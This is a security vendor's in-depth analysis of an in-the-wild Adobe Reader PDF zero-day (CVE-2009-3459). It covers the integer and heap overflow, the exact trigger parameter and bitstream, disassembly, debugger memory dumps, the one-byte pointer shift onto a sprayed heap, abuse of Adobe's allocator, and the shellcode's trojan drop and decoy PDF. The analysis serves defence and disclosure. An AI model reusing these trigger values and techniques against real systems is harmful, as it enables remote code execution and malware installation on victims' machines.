Smashing Adobe's Heap Memory Management Systems for Profit.

In-depth research on the recent PDF zero-day exploit

Research and Analysis: Haifei Li
Editors: Guillaume Lovet (Editing & Overview), Derek Manky

Introduction

As pointed out in a recent blog post, PDF vulnerabilities are receiving an increasing amount of attention in the security industry, mirroring their growing use by cybercriminals.

Very recently, a new high-risk PDF zero-day vulnerability (CVE-2009-3459) was reported on Adobe's blog as being exploited in the wild, as part of a targeted attack.

As of writing, a vendor patch is available, and we highly recommend applying it. If, for some reason, immediate patching is not possible, security equipment (AV, IDS, IPS, etc.) must be adjusted to block potentially malicious PDF documents leveraging this vulnerability.

For that purpose, this document provides an analysis of one malicious PDF file found in the wild, as well as in-depth insights into that vulnerability.


Overview

PDF files are mostly made of tags, parameters, and streams, and can include JavaScript code. This vulnerability stems from an integer overflow when Adobe Reader processes a particular parameter.

Now, integer overflows are fairly common, but leveraging them into execution of arbitrary code is often tremendously difficult and requires real craft. Whoever is behind this exploit managed to do it, introducing in the process a rather innovative strategy (not a universal one, though: it works only on Adobe Reader). There are five essential steps in the exploit:

  • A parameter in the PDF file is set to a particular high value. Adobe Reader uses that parameter for an operation, resulting in an integer overflow. Consequence: the result value of that operation is smaller than the program would expect, given the value of the parameter.
  • That overflowed value is used to allocate a buffer on the Heap. The buffer is consequently smaller than it should be, given the parameter value.
  • The program follows its normal flow, which is to "adjust" contents of the aforementioned buffer according to information bit-encoded in a stream within the PDF document. This results in memory on the heap being overwritten (Heap overflow), since the processed stream is longer than the small allocated buffer.
  • Because the bitstream controlling those "adjustments" is provided by the attacker (it is in the PDF document), it is carefully tailored to overwrite just a tiny part of the heap memory. Because the possible "adjustments" are very limited, the best the attacker could do was to increment by one a pointer, stored on the heap, to a C-style structure; this shifts the function pointer read from that structure by a single byte. This function pointer is ultimately called, and serves as the transfer point to malicious code (control of EIP). Changing the effective value of this function pointer through a one-byte shift is the hardest part, and quite innovative. It leaves one question open: how to ensure that malicious code sits at the target address when the execution flow is eventually transferred through the function pointer?
  • By spraying the heap with chunks of NOP slides ending with the desired shellcode. This is achieved with JavaScript embedded in the PDF file (a typical heap spraying method).

The steps above are studied in sections 1 and 2.

Some would say that what happens once the attacker has gained control of the execution flow is a mere detail. It indeed pertains to the specifics of the studied attack, not to the exploit in general; the payload of this attack is addressed in section 3.


Section 1: The Vulnerability

The parameter triggering the initial integer overflow (and thus the exploit) sits in the following section within the malicious PDF:


<<
/ParamX 1073741838			//the key parameter
>>
/Length 299
/Filter /FlateDecode
>>
stream
[stream encoded by flate, original stream is: 00 00 20 00 00 00 10]
endstream

ParamX is the key parameter, and is set to 1073741838 (0x4000000E in hexadecimal). Note that the encoded stream is irrelevant, since at the point of execution where the overflow occurs, it has already been decoded (i.e. "inflated").

The decoded, original stream is: 00 00 20 00 00 00 10.

After long and thorough debugging sessions, we finally came to this point, where the key parameter (0x4000000E) is being used:



Figure 1: The point of the vulnerability: Integer overflow

Figure 1 above shows that the process uses the parameter value 0x4000000E (sitting in ECX) at instruction 009F60A5h (highlighted in red). The goal of this instruction is seemingly to compute the amount of memory, in bytes, needed when one DWORD (4 bytes) is allocated per item, the number of items being given by the key parameter (which means that the parameter most likely represents an item count).

That is why the param value is multiplied by 4, and this is where the integer overflow occurs.

Highlighted with a black background and red foreground on Figure 1 is instruction 009F60E5h, which is a call to the memory allocation routine using the overflowed value (the values of EDX and ECX at 009F60D8h are both 0):

acro_allocate_routine (0x4000000E*4+0x48) ==> acro_allocate_routine (0x80)

Note: We will discuss the "acro_allocate_routine" function in section 2.4.
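The wraparound can be reproduced outside of Adobe Reader. The following is only a minimal sketch, assuming (from the call shown above) 4 bytes per item plus a 0x48-byte header; the function and macro names are hypothetical and do not come from the binary.

```c
#include <stdint.h>

/* Assumed from the call shown above: 4 bytes per item plus a 0x48-byte header. */
#define ITEM_SIZE   4u
#define HEADER_SIZE 0x48u

/* What 32-bit arithmetic yields: the result wraps modulo 2^32. */
uint32_t request_size_32(uint32_t item_count)
{
    return item_count * ITEM_SIZE + HEADER_SIZE;
}

/* What the same formula yields when nothing is truncated (64-bit arithmetic). */
uint64_t request_size_64(uint32_t item_count)
{
    return (uint64_t)item_count * ITEM_SIZE + HEADER_SIZE;
}
```

With ParamX = 0x4000000E, request_size_32 returns 0x80 whereas request_size_64 returns 0x100000080. Note that a perfectly legitimate count of 0x0E also yields 0x80, so the allocator cannot tell the two requests apart.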

As a result, a heap block of 0x80 bytes is allocated; it will be processed by function 009F7ED0, called at the highlighted instruction on Figure 2 below:



Figure 2: Before the heap overflow

This function is listed and analyzed below. To better understand the comments (which are the most important part of the listing), please note that:



  1. lpBuff is the pointer to the heap block (0x80 bytes long).
  2. bits_original_stream is the number of bits in the decoded stream.
  3. v_counter is the current value of the counter, from 0 to bits_original_stream-1.


Again, the decoded stream was "00 00 20 00 00 00 10", which means bits_original_stream is 0x38 (7*8).

The listing follows:


.text:003A7FB4 loc_3A7FB4:                             ; CODE XREF: sub_3A7ED0+1CDj
.text:003A7FB4                 mov     edx, [esp+3Ch+var_C] ; loop starts
.text:003A7FB8                 mov     eax, [esp+3Ch+arg_0]
.text:003A7FBC
.text:003A7FBC loc_3A7FBC:                             ; CODE XREF: sub_3A7ED0+E2j
.text:003A7FBC                 cmp     eax, ecx 	; if v_counter>=bits_original_stream,
.text:003A7FBE                 jge     loc_3A80A3	; break from the loop
.text:003A7FC4                 mov     ebp, [esi+0Ch]	; [esi+0Ch] is 4000000Eh here
.text:003A7FC7                 add     eax, edi		; edi is 0
.text:003A7FC9                 add     eax, edx		; edx is 0
.text:003A7FCB                 cdq
.text:003A7FCC                 idiv    ebp	; v_counter idiv 4000000Eh
.text:003A7FCE                 lea     eax, [ecx+edi]	; edx became v_counter
.text:003A7FD1                 mov     ecx, [esi+10h]
.text:003A7FD4                 cmp     ecx, 3
.text:003A7FD7                 lea     ebx, [esi+edx*4+44h]          ; lpBuff + v_counter*4 + 0x44

...

.text:003A805C loc_3A805C:                             ; CODE XREF: sub_3A7ED0+168j
.text:003A805C                 mov     edx, [ebx]
.text:003A805E                 push    edx
.text:003A805F                 mov     edx, [esp+40h+var_20]
.text:003A8063                 shl     eax, cl
.text:003A8065                 push    edx
.text:003A8066                 mov     edx, [esp+44h+var_28]
.text:003A806A                 shl     ebp, cl
.text:003A806C                 push    ebp
.text:003A806D                 push    eax
.text:003A806E                 mov     eax, [esp+4Ch+arg_0]
.text:003A8072                 add     eax, edi
.text:003A8074                 shl     eax, cl
.text:003A8076                 push    edx
.text:003A8077                 call    sub_9D7850      ; will be analyzed later
.text:003A807C                 add     esp, 14h
.text:003A807F
.text:003A807F loc_3A807F:                             ; CODE XREF: sub_3A7ED0+18Aj
.text:003A807F                 mov     [ebx], eax 	; overwrite the DWORD with the return value
.text:003A8081
.text:003A8081 loc_3A8081:                             ; CODE XREF: sub_3A7ED0+149j
.text:003A8081                                         ; sub_3A7ED0+163j
.text:003A8081                 mov     eax, [esp+3Ch+arg_0]
.text:003A8085                 add     [esp+3Ch+var_18], 2
.text:003A808A                 add     [esp+3Ch+var_1C], 1
.text:003A808F                 mov     ecx, [esp+3Ch+arg_4]
.text:003A8093                 add     eax, 1          ; v_counter++
.text:003A8096                 cmp     eax, [esi+0Ch] ; [ESI+0C]=0x4000000E, so keep looping
.text:003A8099                 mov     [esp+3Ch+arg_0], eax
.text:003A809D                 jl      loc_3A7FB4      ; loop


So what does this function do? It might be easier to get a feel for its goal from the following pseudo-code:


for(;;) {
	if( v_counter >=  bits_original_stream ) break;
	tmp_counter = v_counter % ParamX;
	lpCurrent = lpBuff + tmp_counter * 4 + 0x44;
	iRetVal = mystery_func( *lpCurrent, variables...);
	*lpCurrent = iRetVal;
	v_counter++;
	if( v_counter >= ParamX ) break;
}


Essentially, the function slides over each DWORD in the buffer (remember, the buffer is supposed to contain one DWORD per item counted by ParamX), overwriting it at instruction 003A807F with the result of a "mystery function" (mysterious as of yet, but we'll address it in section 2.1).

This is where the heap overflow occurs, and this is the operational heart of the exploit. Because of the integer overflow, the buffer is actually a lot smaller than expected; it should contain one DWORD per item of ParamX, but it does not, thus when the counter enumerates items, it goes past the buffer's end.

It is interesting to note that the loop only exits when the counter reaches bits_original_stream: v_counter >= ParamX will never happen, because of the huge value of ParamX. We will see afterwards that the original stream bits are used by the mystery function, one per item.

The total length of the memory being written is therefore bits_original_stream * 4 (starts from offset 0x44):

0x38*4 = 0xE0

Considering that the length of the heap block which was allocated before (Figure 1) is only 0x80, the function will overwrite 0xA4 (0x44+0xE0-0x80) bytes beyond the allocated heap block.
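The figures above can be checked with a runnable version of the pseudo-code. This is only a sketch: the mystery function is abstracted behind a callback (adjust_fn, a hypothetical name), the counter is assumed to start at 0, and the mock array stands in for the heap block and the memory that follows it.

```c
#include <stddef.h>
#include <stdint.h>

#define DATA_OFFSET 0x44u   /* offset of the first item, relative to lpBuff */
#define BLOCK_LEN   0x80u   /* size of the block that was really allocated */

/* Stand-in for the "mystery function": receives the old DWORD and the counter. */
typedef uint32_t (*adjust_fn)(uint32_t old_dword, uint32_t v_counter);

/* Runs the loop over `mem`, which models lpBuff and whatever follows it.
   Returns the number of bytes written past the end of the block. */
uint32_t run_loop(uint32_t *mem, uint32_t bits_original_stream,
                  uint32_t param_x, adjust_fn adjust)
{
    uint32_t past_end = 0;
    uint32_t v_counter = 0;   /* assumption: the counter starts at 0 */

    for (;;) {
        if (v_counter >= bits_original_stream)
            break;
        uint32_t byte_off = DATA_OFFSET + (v_counter % param_x) * 4u;
        uint32_t *lp_current = &mem[byte_off / 4u];
        *lp_current = adjust(*lp_current, v_counter);
        if (byte_off + 4u > BLOCK_LEN)
            past_end += 4u;   /* this DWORD lies beyond the 0x80-byte block */
        v_counter++;
        if (v_counter >= param_x)
            break;
    }
    return past_end;
}

/* Trivial adjustment, used only to make every visited DWORD visible. */
uint32_t mark_visited(uint32_t old_dword, uint32_t v_counter)
{
    (void)v_counter;
    return old_dword + 1u;
}
```

Called with bits_original_stream = 0x38 and ParamX = 0x4000000E on a zeroed array of 73 DWORDs, run_loop reports 0xA4 bytes written past the block. With ParamX = 0x0E, which requests the same 0x80 bytes, the second exit condition fires first and nothing is written out of bounds.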

Monitoring these 0xA4 bytes of overflowed memory shows that very few memory values were actually changed. This is apparent on Figure 3 below:



Figure 3: After the heap overflow

Indeed, comparing it with Figure 2 above (before the heap overflow), we see that only 2 DWORDs were modified by the heap overflow (Note: offset is relative to the end of the allocated heap block):



  1. Offset 0x0C, from 0x0121676C to 0x0121676D.
  2. Offset 0x90, from 0x0124DA40 to 0x0124DA41.


How and why those two slight modifications occur form the logical heart of the exploit. This is addressed in the next section.


Section 2: The Exploitation

As mentioned above, the overflowed memory is set by the mystery function, which uses the (attacker-provided) decoded stream.


2.1: The Mystery Function


.text:009D7884                 mov     esi, edi        ; edi is v_counter
.text:009D7886                 sar     esi, 3          ; v_counter/8
.text:009D7889                 add     esi, [esp+1Ch+lp_original_stream] ; pass how many bytes
.text:009D788D                 mov     ecx, edi
.text:009D788F                 movzx   edx, byte ptr [esi] ; read next byte
.text:009D7892                 and     ecx, 7      ; pass how many bits in the next byte
.text:009D7895                 mov     eax, 8
.text:009D789A                 sub     eax, ecx
.text:009D789C                 sub     eax, ebp        ; ebp is always 1
.text:009D789E                 mov     cl, al
.text:009D78A0                 shr     edx, cl    	; set the lowest bit as the corresponding bit
.text:009D78A2                 and     edx, [esp+1Ch+var_8] ; var_8 is always 1, so corresponding bit is the DWORD value
.text:009D78A6                 cmp     [esp+1Ch+arg_C], 0 ; arg_C is always 0
.text:009D78AC                 jz      short loc_9D78BC ; jump

...

.text:009D78BC loc_9D78BC:                             ; CODE XREF: sub_9D7850+5Cj
.text:009D78BC                 mov     ecx, [esp+1Ch+arg_10]; get the old_DWORD
.text:009D78C0                 add     ecx, edx        ; new_DWORD = old_DWORD + corresponding-bit
.text:009D78C2                 mov     edx, ecx
.text:009D78C4
.text:009D78C4 loc_9D78C4:                             ; CODE XREF: sub_9D7850+6Aj
.text:009D78C4                 and     dl, [esp+1Ch+var_9]
.text:009D78C8                 add     edi, [esp+1Ch+arg_8]
.text:009D78CC                 mov     [esp+1Ch+arg_10], ecx 	; save the new_DWORD

...

.text:009D78E5                 mov     eax, [esp+18h+arg_10] 	; return the new_DWORD

In short, the function first retrieves a bit in the decoded stream by using the current counter's value (v_counter); as explained earlier, we can consider that each item in the buffer has a corresponding bit in the stream, thus we'll call this bit "corresponding_bit".

This bit is then converted into a DWORD and added to the DWORD (representing an item) being processed:

new_DWORD = old_DWORD + corresponding_bit

As a matter of course, corresponding_bit can only be 1 or 0. Thus the new DWORD cannot be set to an arbitrary value: either it remains unchanged, or it is incremented by 1. That is all the attacker can control, via the bitstream.

Since the original stream is '00 00 20 00 00 00 10', only the bits at position 0x12 and 0x33 are set to 1. Thus only the two DWORDs located at position 0x12 and 0x33 will be incremented.

Relative to the end of the 0x80-length heap block, those DWORDs sit at the following offsets:

offset1 = 0x12*4 + 0x44 - 0x80 = 0x0C
offset2 = 0x33*4 + 0x44 - 0x80 = 0x90
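The bit positions and offsets above can be recomputed with a short C sketch. It assumes, as the listing suggests, that bits are taken most significant bit first within each byte; the helper names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define DATA_OFFSET 0x44u
#define BLOCK_LEN   0x80u

/* Bit `index` of the stream, taking the most significant bit of each byte first.
   The shift count 8 - (index & 7) - 1 is the one computed in the listing. */
unsigned stream_bit(const uint8_t *stream, size_t index)
{
    unsigned shift = 8u - (unsigned)(index & 7u) - 1u;
    return ((unsigned)stream[index >> 3] >> shift) & 1u;
}

/* Offset of item `index`, relative to the end of the 0x80-byte block
   (negative when the item still lies inside the block). */
long offset_past_block(size_t index)
{
    return (long)(index * 4u + DATA_OFFSET) - (long)BLOCK_LEN;
}

/* Writes the offsets of the DWORDs that get incremented into `out`
   and returns how many were stored. */
size_t incremented_offsets(const uint8_t *stream, size_t stream_len,
                           long *out, size_t out_cap)
{
    size_t found = 0;
    for (size_t i = 0; i < stream_len * 8u && found < out_cap; i++) {
        if (stream_bit(stream, i))
            out[found++] = offset_past_block(i);
    }
    return found;
}
```

Fed with the seven bytes 00 00 20 00 00 00 10, incremented_offsets stores exactly two values, 0x0C and 0x90.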

This matches what we observed at the end of section 1 above. So, what are those two DWORDs, and why increment them?


2.2: Taking Control of the Execution Flow

After many experiments, it appeared that, no matter what the memory situation was, one of these two DWORDs was a pointer to a C-style structure whose memory location varies. This structure is used while Adobe Reader renders the page within the PDF. Most of the time, it is pointer2 (offset2, 0x90) that points to the structure. An example is given below.

First, we check that the pointer at offset 0x90 was incremented during the overflow:


Breakpoint 0 hit
eax=02008b1c ebx=00000001 ecx=0012ed54 edx=0438afcb esi=0438af18 edi=0012eea0
eip=009f7868 esp=0012ed3c ebp=0438afcb iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
AcroRd32!AVAcroALM_IsFeatureEnabled+0x63e09:
009f7868 e863060000      call    AcroRd32!AVAcroALM_IsFeatureEnabled+0x64471 (009f7ed0)
0:000> dd esp
0012ed3c  0012ed54 0438af18 02008b1c 00000000
0012ed4c  0210b734 01f2b424 0438afcb 00a8da8e 
0:000> dd 02008b1c+80+90
02008c2c  0124da40 00000544 0017ee98 ffffffff
02008c3c  00000000 00000000 00000000 00000000

Breakpoint 1 hit
eax=00000000 ebx=00000001 ecx=00000038 edx=00000000 esi=0438af18 edi=0012eea0
eip=009f786d esp=0012ed3c ebp=0438afcb iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
AcroRd32!AVAcroALM_IsFeatureEnabled+0x63e0e:
009f786d 83c40c          add     esp,0Ch
0:000> dd 02008b1c+80+90
02008c2c  0124da41 00000544 0017ee98 ffffffff
02008c3c  00000000 00000000 00000000 00000000

Before the overflow, the pointer to the structure is 0x0124da40; after the overflow, it has become 0x0124da41.

The following figure then shows how the structure is being referred to after the overflow:



Figure 4: Going into the shellcode

Firstly, the structure address is put into EAX. Then the first DWORD value of the structure is read. If this value is greater than 0x90, then it continues to read the value stored at offset 0x90 (relative to the beginning of the structure): the value at this offset is read as a function pointer and is put into EAX. Finally, if this function pointer is not NULL, it goes into the function.

Thus, the goal of the attacker is really to change the value of this pointer at offset 0x90 of the structure (note: it's just a coincidence that this offset is also 0x90, the same offset used for the pointer to the structure relative to the heap block). This changed function pointer is used to gain control of the execution flow. To do this, the attacker could only increment the pointer to the structure (via the bitstream, see previous section), thus shifting all the values of the structure by one byte. He could not give the function pointer inside the structure an arbitrary value, which makes this exploit quite crafty indeed.

This can be seen by comparing the memory under normal and attack (i.e. when the exploit occurred) conditions. Dumping the structure in normal conditions results in:


0:000> dd 0124da40
0124da40  0000010c 00965450 00968cc0 00aae890
0124da50  01021e10 01024380 01021e40 01024430
0124da60  009671c0 010243e0 00971670 01022e80
0124da70  00a468c0 00970d10 0096f060 00964e80
0124da80  0096f7d0 0096fe30 00961ca0 0095c060
0124da90  010228e0 00000000 00000000 00000000
0124daa0  00000000 00000000 00000000 00000000
0124dab0  00000000 00960420 00000000 00000000
0124dac0  0099f2e0 00970750 009712d0 00971420
0124dad0  00000000 00a03950 00a1ced0 01022c10
0124dae0  01022cc0 01022d40 00000000 00000000

Normal conditions: Even though 0x10c is greater than 0x90, because the function pointer at offset 0x90 (0124dad0) is NULL, nothing will happen.

But under attack conditions, after the heap overflow (pay attention to endian-ness when shifting bytes):


0:000> dd 0124da41
0124da41  50000001 c0009654 9000968c 1000aae8
0124da51  8001021e 40010243 3001021e c0010244
0124da61  e0009671 70010243 80009716 c001022e
0124da71  1000a468 6000970d 800096f0 d000964e
0124da81  300096f7 a00096fe 6000961c e00095c0
0124da91  00010228 00000000 00000000 00000000
0124daa1  00000000 00000000 00000000 00000000
0124dab1  20000000 00009604 00000000 e0000000
0124dac1  500099f2 d0009707 20009712 00009714
0124dad1  50000000 d000a039 1000a1ce c001022c
0124dae1  4001022c 0001022d 00000000 00000000

Because 0x50000001 is greater than 0x90, and 0x50000000 is not zero, the control flow will be transferred to 0x50000000.
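The effect of the one-byte shift can be replayed on the bytes of the dump. The sketch below only models the check described for Figure 4; the function names are hypothetical, the comparison is assumed to be unsigned, and only the two 8-byte excerpts of the dump that matter (at 0124da40 and 0124dad0) are loaded.

```c
#include <stdint.h>
#include <string.h>

#define FN_PTR_OFFSET 0x90u

/* Reads a little-endian DWORD at an arbitrary (possibly unaligned) byte offset. */
uint32_t read_le32(const uint8_t *mem, size_t off)
{
    return (uint32_t)mem[off] | ((uint32_t)mem[off + 1] << 8) |
           ((uint32_t)mem[off + 2] << 16) | ((uint32_t)mem[off + 3] << 24);
}

/* Models the check described for Figure 4: returns the address that would be
   called, or 0 when no call is made. */
uint32_t dispatch_target(const uint8_t *mem, size_t struct_off)
{
    if (read_le32(mem, struct_off) <= FN_PTR_OFFSET)
        return 0;
    return read_le32(mem, struct_off + FN_PTR_OFFSET);
}

/* Fills `mem` (at least 0x98 bytes) with the relevant bytes of the dump. */
void load_dump_excerpt(uint8_t *mem)
{
    static const uint8_t head[8] = {0x0c, 0x01, 0x00, 0x00, 0x50, 0x54, 0x96, 0x00}; /* 0124da40 */
    static const uint8_t tail[8] = {0x00, 0x00, 0x00, 0x00, 0x50, 0x39, 0xa0, 0x00}; /* 0124dad0 */
    memset(mem, 0, 0x98);
    memcpy(mem, head, sizeof head);
    memcpy(mem + FN_PTR_OFFSET, tail, sizeof tail);
}
```

With the structure read at offset 0 (normal conditions), dispatch_target returns 0 and nothing is called. Read at offset 1 (pointer incremented by the overflow), the first DWORD becomes 0x50000001 and dispatch_target returns 0x50000000.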

It should be noted that, as per our tests, it is sometimes pointer1 (offset 0x0C relative to the end of the 0x80-length heap block) that points to the structure, which is why the attacker increments that pointer as well.

The attacker did not change any other DWORDs because changing those two is the minimum necessary condition under which the exploit will run. Changing any other DWORD may cause the application to crash before control of EIP is gained.


2.3: The Heap Spray

As pointed out above, the attacker does not precisely control where the ultimate function pointer will branch: he can only have it point to 0x50000000. Luckily for him, this address generally belongs to the heap. Therefore, filling the heap with shellcode helps ensure that malicious code is executed when control reaches 0x50000000.

This is achieved by a classical heap spray in JavaScript (Figure 5):



Figure 5: The decoded JavaScript using the heap spray technique

The shellcode that this script sprays all over the heap will be addressed in section 3, as it is not part of the exploit per se.


2.4: Smashing Adobe's Heap Memory Management System

Why use 0x80 as the bogus heap block allocation length? In other words, why select 0x4000000E as the vulnerable ParamX value?

Generally speaking, heap memory allocations on a Windows system eventually call the system API RtlAllocateHeap to request a new heap block. In such a situation, the memory values around the returned block are unpredictable for the application.

However, Adobe Reader uses its own heap management routine: if the block's length is less than or equal to 0x80 bytes, the request won't be submitted to the system level heap management routine. Instead, Adobe Reader's own memory management routine finds a suitable recycled block matching the requested allocation size.

Following is the relevant code in function "acro_allocate_routine" in "acrord32.dll":


.text:003042DC                 push    offset stru_E886F0 ; lpCriticalSection
.text:003042E1                 mov     [esp+1Ch+allocate_len], offset stru_E886F0
.text:003042E9                 call    ds:EnterCriticalSection
.text:003042EF                 cmp     edi, 80h        ; allocate_len>0x80?
.text:003042F5                 mov     [esp+18h+var_4], 0
.text:003042FD                 ja      short loc_30433B ; allocate_len=0x80, no jumping here
.text:003042FF                 movzx   eax, ds:byte_BFD898[edi]
.text:00304306                 mov     ecx, [esi+eax*4+0Ch] 	; get structure pointer which manages all recycled 0x80-length blocks
.text:00304306                                         	
.text:0030430A                 mov     eax, [ecx+4]    	; the first recycled 0x80-length block
.text:0030430D                 test    eax, eax
.text:0030430F                 jz      short loc_30432F
.text:00304311                 mov     esi, eax
.text:00304313                 mov     eax, [eax+4]    	; next block
.text:00304316                 test    eax, eax
.text:00304318                 mov     edx, [esi-4]
.text:0030431B                 mov     [ecx+4], eax    	; take off the first block from the list
.text:0030431E                 jz      short loc_304326 	; no next block, skip the write below
.text:00304320                 mov     dword ptr [eax], 0
.text:00304326
.text:00304326 loc_304326:                             ; CODE XREF: acro_allocate_routine+7Ej
.text:00304326                 add     dword ptr [edx+4], 1 ; how many recycled blocks have been reused
.text:0030432A                 jmp     loc_3043C4      ; exit, return the first block for use

It can be observed that it does not go into the system level's management routine to allocate a new heap block; instead, it reuses the heap block which has just been marked as "freed" by the application itself (in other words, the system actually does not free this memory).

Because of this, the memory values around this reused block can be fairly easily predicted (or at least stay relatively stable).
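The behaviour can be illustrated with a deliberately simplified model. All names below are hypothetical; the model keeps a single size class (every small request gets a 0x80-byte block) and assumes that a freed block is pushed at the head of the list, which the listing does not show. Only the "take the first recycled block" step mirrors the listing.

```c
#include <stddef.h>
#include <stdlib.h>

#define SMALL_MAX 0x80u   /* threshold seen in the listing */

/* A recycled block stores the link to the next recycled block in its own memory. */
typedef struct recycled { struct recycled *next; } recycled_t;

/* Single size class only, for brevity (assumption, see lead-in). */
static recycled_t *recycled_list = NULL;

/* Small requests are served from the recycle list first; the system allocator
   is reached only when the list is empty or the request is large. */
void *model_alloc(size_t len)
{
    if (len <= SMALL_MAX && recycled_list != NULL) {
        recycled_t *blk = recycled_list;
        recycled_list = blk->next;      /* take the first block off the list */
        return blk;
    }
    return malloc(len <= SMALL_MAX ? SMALL_MAX : len);
}

/* "Freeing" a small block only pushes it onto the recycle list (assumed LIFO). */
void model_free(void *p, size_t len)
{
    if (len <= SMALL_MAX) {
        recycled_t *blk = p;
        blk->next = recycled_list;
        recycled_list = blk;
    } else {
        free(p);
    }
}
```

In this model, a block released with model_free is handed back unchanged by the next small model_alloc call, together with its neighbours in memory. That stability is what an attacker relies on when choosing a request size of 0x80.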

This points to a rather effective method for exploiting heap-based overflow vulnerabilities in Adobe Reader.


Section 3: Post-Exploit Activity & Embedded Shellcode

The shellcode in the JavaScript piece does just one thing: locate and execute another piece of shellcode in the PDF.

Remarkably, the shellcode seeks out the PDF file handle, testing all available handles starting from 0, comparing each to the target size by using the API function GetFileSize:



Figure 6: Shellcode is searching for the file handle of the POC file

The original C code may have looked like:


DWORD dwTestHandle = 0;
DWORD dwFileSize;

// test all the handles, with step 4
while (1)
{
	dwFileSize = GetFileSize((HANDLE)(ULONG_PTR)dwTestHandle, NULL);
	if ((dwFileSize != INVALID_FILE_SIZE) && (dwFileSize >= 0x2000))
	{
		break;
	}
	dwTestHandle = dwTestHandle + 4;
}
// dwTestHandle now holds the handle of the PDF file itself

Then, it uses the obtained file handle to locate and execute the new shellcode embedded within the PDF file:



Figure 7: Shellcode is jumping to another shellcode inside the POC

As a side note, this is not new. The "Phantom Team" used this "shellcode seek and execute" strategy in a malicious PDF over a year ago.

The new shellcode will perform the following activities:


  1. Drop an executable file from the initial PDF file, and execute it. This is actually a trojan which is detected by our Antivirus products as "W32/Protux.GK!tr".
  2. Drop a "normal", harmless PDF from the initial PDF file, open it with Adobe Reader, and rewrite the currently opened malicious PDF with the same content as the dropped normal PDF: this achieves a perfect camouflage effect. In the sample we studied, the disguised file was named "The question of the charter of pro-democracy moment.pdf", located in the Windows temporary directory.

Following are the key points of the new shellcode:



Figure 8: Step #1 - Drop the exe file to the temp directory


Figure 9: Step #2 - Execute the dropped exe file


Figure 10: Step #3 - Drop the disguised PDF file


Figure 11: Step #4 - Open the disguised PDF with Adobe Reader

Conclusion

Looking back over this 0-day attack as a whole, every part of it is ingenious in some way, whether it be the vulnerability, the operational exploitation, the logic behind it, the way to leverage it or the final shellcode. The exploitation method through the heap overflow, which may also be used in future Adobe Reader exploits, is particularly innovative in itself.

FortiGuard Labs has released advisory FGA-2009-35 to respond to this issue, coordinating with Adobe's Security Advisory APSB09-15. Advanced zero-day protection has been available to our customers since October 9th, 2009. The vulnerability can be detected by our IPS signature "Adobe.Reader.Decode.Color.Remote.Code", while our antivirus detects the PDF exploit as "W32/Protux.GK!exploit" and the dropped executable file as "W32/Protux.GK!tr". We nonetheless recommend again that all Adobe Reader and Acrobat users update their application to the latest version as soon as possible.